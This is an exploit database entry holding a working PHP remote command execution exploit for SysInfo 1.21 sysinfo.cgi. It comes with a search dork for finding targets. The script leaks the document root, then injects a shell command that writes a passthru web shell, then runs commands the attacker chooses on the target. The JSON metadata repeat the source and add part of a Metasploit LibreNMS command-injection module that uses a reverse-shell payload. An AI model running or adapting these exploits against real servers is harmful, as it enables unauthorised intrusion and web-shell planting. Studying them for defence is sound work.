ID 1337DAY-ID-359
Type zdt
Reporter rgod
Modified 2006-04-14T00:00:00
Description
Exploit for cgi platform in category web applications
===========================================================
SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit
===========================================================
#!/usr/bin/php -q -d short_open_tag=on
<?
// Banner, then the usage text when fewer than three positional arguments
// (host, path, cmd) were given; output is byte-identical to the original.
echo "sysinfo.cgi 1.21 remote cmmnds xctn \r\n";
echo "by rgod [email protected]\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "dork: inurl:sysinfo.cgi ext:cgi\r\n\r\n";
if ($argc < 4) {
    echo "Usage: php {$argv[0]} host path cmd OPTIONS\r\n",
        "host: target server (ip/hostname)\r\n",
        "path: path to sysinfo.cgi\r\n",
        "cmd: a shell command\r\n",
        "Options:\r\n",
        " -p[port]: specify a port other than 80\r\n",
        " -P[ip:port]: specify a proxy\r\n",
        "Examples:\r\n",
        "php {$argv[0]} localhost /cgi-bin/sysinfo/ \n",
        "php {$argv[0]} localhost /cgi-bin/sysinfo/ ls -la -p81\r\n",
        "php {$argv[0]} localhost /cgi-bin/ ls -la -P1.1.1.1:80\r\n";
    exit;
}
/* tested on sysinfo.cgi v1.21:
http;//[target]/cgi-bin/sysinfo.cgi?action=systemdoc&name=;[some_command]
you don't see any output but you can redirect some shellcode to some file
also you can disclose www path:
http;//[target]/cgi-bin/sysinfo.cgi?action=debugger
*/
// Runtime setup: hide every diagnostic (socket failures are handled by
// return-value checks instead), lift the execution time limit, and give
// up on a connect attempt after five seconds.
error_reporting(0);
ini_set('max_execution_time', 0);
ini_set('default_socket_timeout', 5);
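/**
 * Render a byte string as a debug dump: a hex listing followed by a
 * printable listing, both wrapped every 15 bytes.
 *
 * Each byte contributes " xx" (two lowercase hex digits) to the hex part
 * and " c" to the text part, where bytes <= 0x20 or > 0x7e are shown as
 * " .". After every 15th byte a "\r\n" is appended to both parts. The
 * result is hex part . "\r\n" . text part; an empty input yields "\r\n".
 *
 * Fixes versus the original: the classification used bitwise '|' on two
 * booleans (worked by accident, read as a bit operation) and strlen() was
 * re-evaluated on every iteration; the hex padding branch is replaced by
 * sprintf('%02x'), which produces the same two-digit output.
 *
 * @param string $string raw bytes to dump (e.g. an HTTP request)
 * @return string hex listing, CRLF, printable listing
 */
function quick_dump($string)
{
    $hex = '';
    $text = '';
    $length = strlen($string);
    for ($i = 0; $i < $length; $i++) {
        $byte = ord($string[$i]);
        // Control characters, space and anything above DEL are shown as '.'.
        $text .= ($byte <= 32 || $byte > 126) ? ' .' : ' ' . $string[$i];
        // %02x zero-pads single-digit values, matching the old dechex() + "0" path.
        $hex .= sprintf(' %02x', $byte);
        // Wrap both columns after every 15th byte.
        if (($i + 1) % 15 === 0) {
            $text .= "\r\n";
            $hex .= "\r\n";
        }
    }
    return $hex . "\r\n" . $text;
}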
// Shape check for the -P option: dotted-quad "ip:port". The parentheses are
// the PCRE delimiters; octet and port ranges are not validated, only digit
// counts, and the match may occur anywhere in the string.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
/* Open one TCP connection (directly to $host:$port, or to the -P proxy),
   write a single raw HTTP request and collect the entire response into
   the global $html. The function communicates only through globals:
     reads  $proxy, $host, $port, $proxy_regex
     writes $html (overwritten on every call)
   Nothing is returned; any connect failure prints a message and ends the
   script. Warnings from fsockopen()/fgets() are hidden by the file-level
   error_reporting(0). */
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
// Direct mode. gethostbyname() returns its argument unchanged when
// resolution fails, so a bad hostname shows up as a connect failure here.
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
// Proxy mode: $proxy must match the ip:port shape in $proxy_regex (digit
// counts only, no range check) and is then split on ':'.
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
// One request per connection; every packet built below carries "Connection: Close".
fputs($ock,$packet);
if ($proxy=='') {
// Direct: read line by line until the server closes the socket.
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
// Proxy: read one byte at a time. Because the conditions are joined with
// 'or', the loop ends only once EOF has been reached AND a CRLFCRLF header
// terminator has been seen in $html. eregi() belongs to the POSIX-regex
// extension removed in PHP 7.0, so this branch only runs on PHP 5 and older.
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
// ---- argument handling ---------------------------------------------------
// argv[1] = target host, argv[2] = directory that holds sysinfo.cgi (must
// begin and end with '/'). Every later argument is appended to the command
// unless its first two characters are "-p" (port) or "-P" (proxy).
$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";
for ($i=3; $i<=$argc-1; $i++){
// Only the first two characters decide whether an argument is an option.
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
// str_replace() removes every "-p" occurrence, not only the leading one.
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
// Through a proxy the request line must carry an absolute URI; otherwise the bare path suffices.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
//step 1 -> retrieve application path
// action=debugger makes sysinfo.cgi echo a form whose hidden field
// name="pfad" carries the document root (information disclosure; see the
// note at the top of the script). Detection: a GET for sysinfo.cgi with
// action=debugger in the web-server access log.
$packet ="GET ".$p."sysinfo.cgi?action=debugger HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
#echo quick_dump($packet);
sendpacketii($packet);
// Scrape the value with explode(); when the marker is absent $temp[1] is
// undefined (hidden by error_reporting(0)) and the empty-$pfad check below
// stops the script.
$temp=explode("name=\"pfad\" value=\"",$html);
$temp2=explode("\"",$temp[1]);
$pfad=$temp2[0];
if ($pfad=='') {die("cannot retrieve document root...\r\n");}
echo "document root ->".$pfad."\r\n";
//step 2 -> we don't see any output, so let's create a php shell, you know, I'm phpcentric
// The 'name' parameter of action=systemdoc is interpolated into a shell
// command (per the "tested on" note above): a leading ';' ends the intended
// command and the remainder redirects an echo into a new file under the
// disclosed document root. The CGI returns no command output, hence the
// file drop. Detection: action=systemdoc requests whose name= value starts
// with %3B, and an unexpected .php file appearing in the web root owned by
// the web-server user. Mitigation is vendor-side: never pass 'name' to a
// shell without validation/escaping.
$temp=";echo \<?php passtrhu\(\\\$_GET[cmd]\)?\> > ".$pfad."/phpinfo.php";
$temp=urlencode($temp);
$packet ="GET ".$p."sysinfo.cgi?action=systemdoc&name=".$temp." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
#echo quick_dump($packet);
sendpacketii($packet);
//step 3 -> launch commands
// From here on the requests go to the dropped file (?cmd=...) at the site
// root and no longer touch sysinfo.cgi; its response is printed verbatim.
$packet ="GET /phpinfo.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
#echo quick_dump($packet);
sendpacketii($packet);
echo $html;
?>
# 0day.today [2018-02-17] #
{"published": "2006-04-14T00:00:00", "id": "1337DAY-ID-359", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:42:05", "bulletin": {"published": "2006-04-14T00:00:00", "id": "1337DAY-ID-359", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.5, "modified": "2016-04-20T01:42:05"}}, "hash": "28f88d483b05a0bbe6194a97e9d197bbb228dc9c1012c39f99b986d271f6587b", "description": "Exploit for cgi platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:42:05", "edition": 1, "title": "SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit", "href": "http://0day.today/exploit/description/359", "modified": "2006-04-14T00:00:00", "bulletinFamily": "exploit", "viewCount": 10, "cvelist": [], "sourceHref": "http://0day.today/exploit/359", "references": [], "reporter": "rgod", "sourceData": "===========================================================\r\nSysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit\r\n===========================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\necho \"sysinfo.cgi 1.21 remote cmmnds xctn \\r\\n\";\r\necho \"by rgod rgod@autistici.org\\r\\n\";\r\necho \"site: http://retrogod.altervista.org\\r\\n\\r\\n\";\r\necho \"dork: inurl:sysinfo.cgi ext:cgi\\r\\n\\r\\n\";\r\n\r\nif ($argc<4) {\r\necho \"Usage: php \".$argv[0].\" host path cmd OPTIONS\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to sysinfo.cgi\\r\\n\";\r\necho \"cmd: a shell command\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Examples:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/sysinfo/ \\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/sysinfo/ ls -la -p81\\r\\n\";\r\necho \"php \".$argv[0].\" 
localhost /cgi-bin/ ls -la -P1.1.1.1:80\\r\\n\";\r\ndie;\r\n}\r\n\r\n/* tested on sysinfo.cgi v1.21:\r\n\r\n http;//[target]/cgi-bin/sysinfo.cgi?action=systemdoc&name=;[some_command]\r\n\r\n you don't see any output but you can redirect some shellcode to some file\r\n\r\n also you can disclose www path:\r\n\r\n http;//[target]/cgi-bin/sysinfo.cgi?action=debugger\r\n\t\t\t\t\t\t\t\t\t */\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo 
\"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$cmd=\"\";$port=80;$proxy=\"\";\r\n\r\nfor ($i=3; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\r\n{$cmd.=\" \".$argv[$i];}\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\n\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n//step 1 -> retrieve application path\r\n$packet =\"GET \".$p.\"sysinfo.cgi?action=debugger HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\n$temp=explode(\"name=\\\"pfad\\\" value=\\\"\",$html);\r\n$temp2=explode(\"\\\"\",$temp[1]);\r\n$pfad=$temp2[0];\r\nif ($pfad=='') {die(\"cannot retrieve document root...\\r\\n\");}\r\necho \"document root ->\".$pfad.\"\\r\\n\";\r\n\r\n\r\n//step 2 -> we don't see any output, so let's create a php shell, you know, I'm phpcentric\r\n$temp=\";echo \\<?php passtrhu\\(\\\\\\$_GET[cmd]\\)?\\> > \".$pfad.\"/phpinfo.php\";\r\n$temp=urlencode($temp);\r\n$packet =\"GET \".$p.\"sysinfo.cgi?action=systemdoc&name=\".$temp.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\n\r\n//step 3 -> launch commands\r\n$packet =\"GET /phpinfo.php?cmd=\".urlencode($cmd).\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\necho $html;\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": 
"d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e046949df31fc1824643bc869e2983fe", "key": "modified"}, {"hash": "810ecb2ef37210833f0536b341b147a9", "key": "sourceData"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "705e4a86f7d8115ba39badec1b887add", "key": "description"}, {"hash": "e046949df31fc1824643bc869e2983fe", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "7a4567f1accd64946c1ad5e56e6c5bc6", "key": "title"}, {"hash": "4fed0d8b7a47738c0ff917619635fba3", "key": "sourceHref"}, {"hash": "5d7e29811c87ed83936a31ccde4cdf65", "key": "href"}], "objectVersion": "1.0"}}], "description": "Exploit for cgi platform in category web applications", "hash": "52f9b316a81971e3a47ac2ec1d014fc89fcb1895ed825e215903bd450530e6b4", "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2018-02-17T21:31:00"}, "dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:153078"]}, {"type": "zdt", "idList": ["1337DAY-ID-32801", "1337DAY-ID-32652", "1337DAY-ID-32287", "1337DAY-ID-31462", "1337DAY-ID-30511", "1337DAY-ID-30347", "1337DAY-ID-29906", "1337DAY-ID-29629", "1337DAY-ID-29512", "1337DAY-ID-28869"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_CHANNEL_BRUTE"]}, {"type": "seebug", "idList": ["SSV:97208"]}, {"type": "nessus", "idList": ["SLACKWARE_SSA_2017-266-02.NASL", "F5_BIGIP_SOL52320548.NASL", "MACOSX_SECUPD_10_11_6_2017-002__10_10_5_2017-002.NASL"]}, {"type": "slackware", "idList": ["SSA-2017-266-02"]}, {"type": "f5", "idList": ["F5:K52320548"]}, {"type": "exploitdb", "idList": ["EDB-ID:42466"]}], "modified": "2018-02-17T21:31:00"}, "vulnersScore": -0.5}, "type": "zdt", "lastseen": "2018-02-17T21:31:00", "edition": 2, "title": "SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit", "href": "https://0day.today/exploit/description/359", "modified": 
"2006-04-14T00:00:00", "bulletinFamily": "exploit", "viewCount": 41, "cvelist": [], "sourceHref": "https://0day.today/exploit/359", "references": [], "reporter": "rgod", "sourceData": "===========================================================\r\nSysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit\r\n===========================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\necho \"sysinfo.cgi 1.21 remote cmmnds xctn \\r\\n\";\r\necho \"by rgod [email\u00a0protected]\\r\\n\";\r\necho \"site: http://retrogod.altervista.org\\r\\n\\r\\n\";\r\necho \"dork: inurl:sysinfo.cgi ext:cgi\\r\\n\\r\\n\";\r\n\r\nif ($argc<4) {\r\necho \"Usage: php \".$argv[0].\" host path cmd OPTIONS\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to sysinfo.cgi\\r\\n\";\r\necho \"cmd: a shell command\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Examples:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/sysinfo/ \\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/sysinfo/ ls -la -p81\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /cgi-bin/ ls -la -P1.1.1.1:80\\r\\n\";\r\ndie;\r\n}\r\n\r\n/* tested on sysinfo.cgi v1.21:\r\n\r\n http;//[target]/cgi-bin/sysinfo.cgi?action=systemdoc&name=;[some_command]\r\n\r\n you don't see any output but you can redirect some shellcode to some file\r\n\r\n also you can disclose www path:\r\n\r\n http;//[target]/cgi-bin/sysinfo.cgi?action=debugger\r\n\t\t\t\t\t\t\t\t\t */\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if 
(strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$cmd=\"\";$port=80;$proxy=\"\";\r\n\r\nfor ($i=3; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\r\n{$cmd.=\" \".$argv[$i];}\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\n\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n//step 1 -> retrieve application path\r\n$packet =\"GET \".$p.\"sysinfo.cgi?action=debugger HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\n$temp=explode(\"name=\\\"pfad\\\" value=\\\"\",$html);\r\n$temp2=explode(\"\\\"\",$temp[1]);\r\n$pfad=$temp2[0];\r\nif ($pfad=='') {die(\"cannot retrieve document root...\\r\\n\");}\r\necho \"document root ->\".$pfad.\"\\r\\n\";\r\n\r\n\r\n//step 2 -> we don't see any output, so let's create a php shell, you know, I'm phpcentric\r\n$temp=\";echo \\<?php passtrhu\\(\\\\\\$_GET[cmd]\\)?\\> > \".$pfad.\"/phpinfo.php\";\r\n$temp=urlencode($temp);\r\n$packet =\"GET \".$p.\"sysinfo.cgi?action=systemdoc&name=\".$temp.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\n\r\n//step 3 -> launch commands\r\n$packet =\"GET /phpinfo.php?cmd=\".urlencode($cmd).\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n#echo quick_dump($packet);\r\nsendpacketii($packet);\r\necho $html;\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-02-17] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "705e4a86f7d8115ba39badec1b887add", "key": "description"}, {"hash": "d540995d88d9c9be9621d23a33c61f0e", "key": "href"}, {"hash": "e046949df31fc1824643bc869e2983fe", "key": "modified"}, {"hash": "e046949df31fc1824643bc869e2983fe", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": 
"ad1187a0bb3a578d421438160684ccee", "key": "sourceData"}, {"hash": "89489db3e8c9b5675ad81e87d4c4ffb0", "key": "sourceHref"}, {"hash": "7a4567f1accd64946c1ad5e56e6c5bc6", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-11-23T12:25:56", "bulletinFamily": "exploit", "description": "This module exploits a command injection vulnerability in the open source network management software known as LibreNMS. The community parameter used in a POST request to the addhost functionality is unsanitized. This parameter is later used as part of a shell command that gets passed to the popen function in capture.inc.php, which can result in execution of arbitrary code. This module requires authentication to LibreNMS first.\n", "modified": "2019-06-04T17:24:00", "published": "2019-05-29T23:30:39", "id": "MSF:EXPLOIT/LINUX/HTTP/LIBRENMS_ADDHOST_CMD_INJECT", "href": "", "type": "metasploit", "title": "LibreNMS addhost Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'LibreNMS addhost Command Injection',\n 'Description' => %q(\n This module exploits a command injection vulnerability in the open source\n network management software known as LibreNMS. The community parameter used\n in a POST request to the addhost functionality is unsanitized. 
This parameter\n is later used as part of a shell command that gets passed to the popen function\n in capture.inc.php, which can result in execution of arbitrary code.\n\n This module requires authentication to LibreNMS first.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'mhaskar', # Vulnerability discovery and PoC\n 'Shelby Pace' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2018-20434' ],\n [ 'URL', 'https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/' ],\n [ 'URL', 'https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d' ]\n ],\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n [ 'Linux',\n {\n 'Platform' => 'unix',\n 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse' }\n }\n ]\n ],\n 'DisclosureDate' => '2018-12-16',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]),\n OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),\n OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ])\n ])\n end\n\n def login\n login_uri = normalize_uri(target_uri.path, 'login')\n res = send_request_cgi('method' => 'GET', 'uri' => login_uri)\n fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200\n\n cookies = res.get_cookies\n\n login_res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => login_uri,\n 'cookie' => cookies,\n 'vars_post' =>\n {\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n }\n )\n\n fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302\n\n cookies = login_res.get_cookies\n res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'cookie' => cookies)\n fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices')\n\n print_status('Successfully logged into LibreNMS. 
Storing credentials...')\n store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])\n login_res.get_cookies\n end\n\n def add_device(cookies)\n add_uri = normalize_uri(target_uri.path, 'addhost')\n @hostname = Rex::Text.rand_text_alpha(6...12)\n comm_payload = \"'; #{payload.encoded}#'\"\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => add_uri,\n 'cookie' => cookies,\n 'vars_post' =>\n {\n 'snmp' => 'on',\n 'force_add' => 'on',\n 'snmpver' => 'v2c',\n 'hostname' => @hostname,\n 'community' => comm_payload,\n 'authalgo' => 'MD5',\n 'cryptoalgo' => 'AES',\n 'transport' => 'udp',\n 'port_assoc_mode' => 'ifIndex'\n }\n )\n\n fail_with(Failure::NotFound, 'Failed to add device') unless res && res.body.include?('Device added')\n print_good(\"Successfully added device with hostname #{@hostname}\")\n\n host_id = res.get_html_document.search('div[@class=\"alert alert-success\"]/a[@href]').text\n fail_with(Failure::NotFound, \"Couldn't retrieve the id for the device\") if host_id.empty?\n host_id = host_id.match(/(\\d+)/).nil? ? nil : host_id.match(/(\\d+)/)\n\n fail_with(Failure::NotFound, 'Failed to retrieve a valid device id') if host_id.nil?\n\n host_id\n end\n\n def del_device(id, cookies)\n del_uri = normalize_uri(target_uri.path, 'delhost')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => del_uri,\n 'cookie' => cookies,\n 'vars_post' =>\n {\n 'id' => id,\n 'confirm' => 1\n }\n )\n\n print_status('Unsure if device was deleted. No response received') unless res\n\n if res.body.include?(\"Removed device #{@hostname.downcase}\")\n print_good(\"Successfully deleted device with hostname #{@hostname} and id ##{id}\")\n else\n print_status('Failed to delete device. 
Manual deletion may be needed')\n end\n end\n\n def exploit\n exp_uri = normalize_uri(target_uri.path, 'ajax_output.php')\n cookies = login\n\n host_id = add_device(cookies)\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => exp_uri,\n 'cookie' => cookies,\n 'vars_get' =>\n {\n 'id' => 'capture',\n 'format' => 'text',\n 'type' => 'snmpwalk',\n 'hostname' => @hostname\n }\n )\n\n del_device(host_id, cookies)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/librenms_addhost_cmd_inject.rb"}, {"lastseen": "2019-11-08T04:28:34", "bulletinFamily": "exploit", "description": "This module uses a John the Ripper or Hashcat .pot file to crack any password hashes in the creds database instantly. JtR's --show functionality is used to help combine all the passwords into an easy to use format.\n", "modified": "2019-04-05T00:50:52", 